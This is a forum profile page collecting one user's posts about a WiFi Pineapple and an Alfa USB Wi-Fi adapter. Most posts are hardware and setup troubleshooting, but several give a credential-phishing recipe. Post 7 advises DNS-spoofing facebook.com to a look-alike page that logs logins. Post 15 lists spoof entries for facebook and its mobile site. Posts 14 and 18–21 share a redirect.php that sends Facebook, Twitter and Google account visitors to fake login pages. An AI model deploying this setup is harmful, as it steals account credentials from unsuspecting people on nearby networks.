Jump to content

Neworld

Active Members
  • Posts

    227
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by Neworld

  1. I shorted my Alfa today and it won't work :( Tip to anyone... don't use 9v to power a usb hub with the Alfa connected to the usb hub. Oops. Looks like I'll be buying a new one....
  2. Ya I tried re-seating but unfortunately that wasn't the problem..... fortunately I got my new pigtail today and all is dandy! :D The signal doubled in strength but the only problem I had was that the new pigtail was longer than I expected... It all fit thought. I got a sweet setup now with a external 10000mah battery, usb hub, ect. ............ I might post pics another day :D
  3. Another great tip if you have low antenna signal and your trying to replace the sma pigtail..... The hotglue is VERY easy to take off if you get some cue tips and some Isopropyl Alcohol. Dab the alcohol around the hot glue and it will fall right off. No need to scrape the hot glue off :D .... Just a tip.
  4. Which usb hub are you using? More specifically its name.
  5. Is there any formatting needed to setup a usb hub?? I want to use a usb storage and the alfa at the same time... I was thinking about buying a usb hub but wasn't sure if you needed to format the pineapple to accept it. How did you set it up? I would also like to add that your power-source might be dangerous... I was reading reviews on amazon and it turns out that the battery in the isound tends to expand and melt. Just a tip in case you have issues.
  6. You don't have to do usb/.... you can create a symbolic ling in the /www/ folder. Here's a guy that made a video on it. Either way works though...
  7. use the dns spoofing tool... you can replace the facebook.com website with a html that looks identical then log the information from there. There are a few videos online on how to do this.
  8. Great! I installed dhclient.... but I'm still having problems setting it up. what are the commands to set this thing up? Have you guys ever used the alfa's internet to power the pineapple? What do I need to do to get this thing working??
  9. Okay, here's the situation... I'm trying to connect the Alfa to my wifi pineapple and use the Alfa internet to provide to the pineapple. I'm not sure if there is a way to do this but here is what I tried: I connected via putty and typed ifconfig wlan1 up iwlist wlan1 scan iwconfig wlan1 essid <network id> key <wireless key> ===and no its not a askii problem either=== dhclient wlan1 [/CODE] All is dandy up until I type dhclient... It is unrecognizable: [CODE] -ash: dhclient: not found [/CODE] I know there is nothing wrong with the Alfa because airmon-ng and airodump work perfectly.... I believe the problem is that dhclient command doesn't exist on the pineapple but neither does dhcpcd or pump. there is probably an easy way to do this but for me I'm having trouble.... help if you can Here are the other two topics I posted on the matter regarding my problem. :( http://forums.hak5.org/index.php?/topic/27087-need-help-setting-up-external-wifi-through-usb-on-pineapple/ http://forums.hak5.org/index.php?/topic/27091-what-specific-os-does-the-wifi-pineapple-run-on/ Note: I'm unsure how to extract .rpm within the pineapple... I was planning on installing dhclient.
  10. I was planning on installing the dhclient package onto the system but I'm not sure how to proceed in doing that. Do you install through command line somewhere along the lines of -apt get??? If so what are the commands to getting dhclient package? If you need to get the file online and winscp it over... where is the directory suppose to be? usr/bin? I believe this is the site for it online.... http://rpmfind.net/linux/rpm2html/search.php?query=dhclient help if you can :D
  11. ..... whatever os the pineapple mark IV is. My laptop is running windows vista but I'm using putty to use the pineapples terminal. You can also try the terminal under the Advanced tab in (172.16.42.1/pineapple) for the pineapple. With the alfa wifi pluged into the wifi pineapple I was trying to get the alfa to give internet to the pineapple. My problem arises here... ifconfig wlan1 up iwconfig wlan1 essid <network name> key <network key> dhclient wlan1 Error: -ash: dhclinet: not recognized [/CODE] I know there is nothing wrong with the alfa because airmon-ng and airodump work perfectly when setting up monitor mode on wlan1 (mon0). note: I'm using putty to use my wifi pineapple terminal. And yes I'm running in root.
  12. I'm having problems with dhclient command and wanted to place a new file into usr/bin to look to see if it fixes my problems.... I need to know the type of os the pineapple is running on. If your interested in helping me and my problem, please refer to this post. http://forums.hak5.org/index.php?/topic/27087-need-help-setting-up-external-wifi-through-usb-on-pineapple/ Issue arises: ifconfig wlan1 up iwconfig wlan1 essid <network name> key <net key> dhclient wlan1 -ash: dhclient: not found [/CODE] help if you understand.
  13. I'm trying to connect my alfa directly into the wifi pineapple and use the internet from the alfa to give internet to my pineapple... I'm using putty to ssh into my wifi pineapple... and I get access to it, but I'm comfused because there is a interface on the wifipineapple home (172.16.42.1/pineapple) and the ssh on the home page thing is disabled. Do I need to use backtrack in order to ssh or putty? Do I need to enable ssh on the home? In regards to airmon-ng and airodump-ng, I can use them just fine and scan perfectly in airodump but I don't know the commands to connect the alfa to the pineapple and use its internet to fuel the pineapple. I hope that helped in understanding my position.
  14. You might want to try changing the redirect.php then.... I was having problems with it before. Try this but don't delete your old one in case it doesn't work. Just rename your redirect.php to redirect1.php so you don't lose it.... Make a new redirect.php and put this in it.... <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "facebook")) { header('Location: facebook.html'); } if (strpos($ref, "twitter")) { header('Location: twitter.html'); } if (strpos($ref, "accounts.google.com")) { header('Location: gmail.html'); } ?> [/CODE] I changed the [CODE] $ref = $_SERVER['HTTP_HOST']; [/CODE] to [CODE] $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; [/CODE] and deleted the "require('error.php')" for testing purposes...
  15. This could be due to the fact that your cellphone doesn't actually go to *facebook.com .... usually they are transferred to a mobile version of facebook.com you might want to try... 172.16.42.1 *facebook.com 172.16.42.1 *m.facebook.com [/CODE] or whatever the url is for phones mine happens to be http://m.facebook.com/ see if that does the trick :D
  16. It doesn't recognize dhclient at the end.... ifconfig wlan1 up iwlist wlan1 scan iwconfig wlan1 essid <network ID> key <wireless key> dhclient wlan1 [/CODE] it returns with not recognizing dhclient Help if you understand how to set up external wifi from wifi pineapple. I'm using the one that came with it. Please explain what I am doing wrong... do I need to install dhclient tool? I even tried setting mon0... it works in regards to airmon-ng but is unrecognizable to iwconfig. Help if you can.
  17. I don't quite know the commands to setup an external usb wifi through putty command line. I can get airmon-ng to work properly, but need help more specifically with the commands to setup the external wifi. I have a feeling its along the lines of ifconfig wlan1 up iwconfig......... .................. I'm a noob I know :D
  18. there were issues in the redirect file where it would get stuck on redirect.php and continuously loop refreshing the php without ever going to the .html. The if statement wasn't getting the url from the address bar, and the error.php was refreshing. I don't know if it was just me with the issue or not, but I thought it was important to post. :D
  19. I was having a bit of trouble with the redirect.php...... here is what I replaced it with. <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")) { header('Location: example.html'); } ?> [/CODE] If your problem was that it wasn't redirecting properly, then this might help.
  20. never mind i figured it out.... it was the redirect.php that was causing me problems. I posted the revised php: <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")) { header('Location: example.html'); } ?> [/CODE]
  21. Fixed the redirect.php copy and replace. :D <?php $ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']; if (strpos($ref, "example")) { header('Location: example.html'); } ?> [/CODE] Report feedback and issues.
  22. I'm having similar problems.... can you explain where you found the configs file to fix the problem?
  23. I am yet to find a solution in regards of connecting the Alpha awus036nha to the wifi pineapple. I'm trying to connect the Alpha directly into the Pineapple and hoping to connect to a network with the alpha and project my own network with the pineapple. If you could direct me to a real solution to this problem it would be very helpful :D I know it is possible to connect the Alpha to the pineapple directly because Hak5 advertises it in their pictures and they seem to have the setup with the Wifi Pineapple Elite. If you have a wifi pineapple elite and would like to share how it is all set up in the box, it would be very helpful as well. Thanks :D
  24. Whats a good alternative to the "Pineapple juice"? I wanted to get a longer lasting battery and was wondering what you guys use. :D
×
×
  • Create New...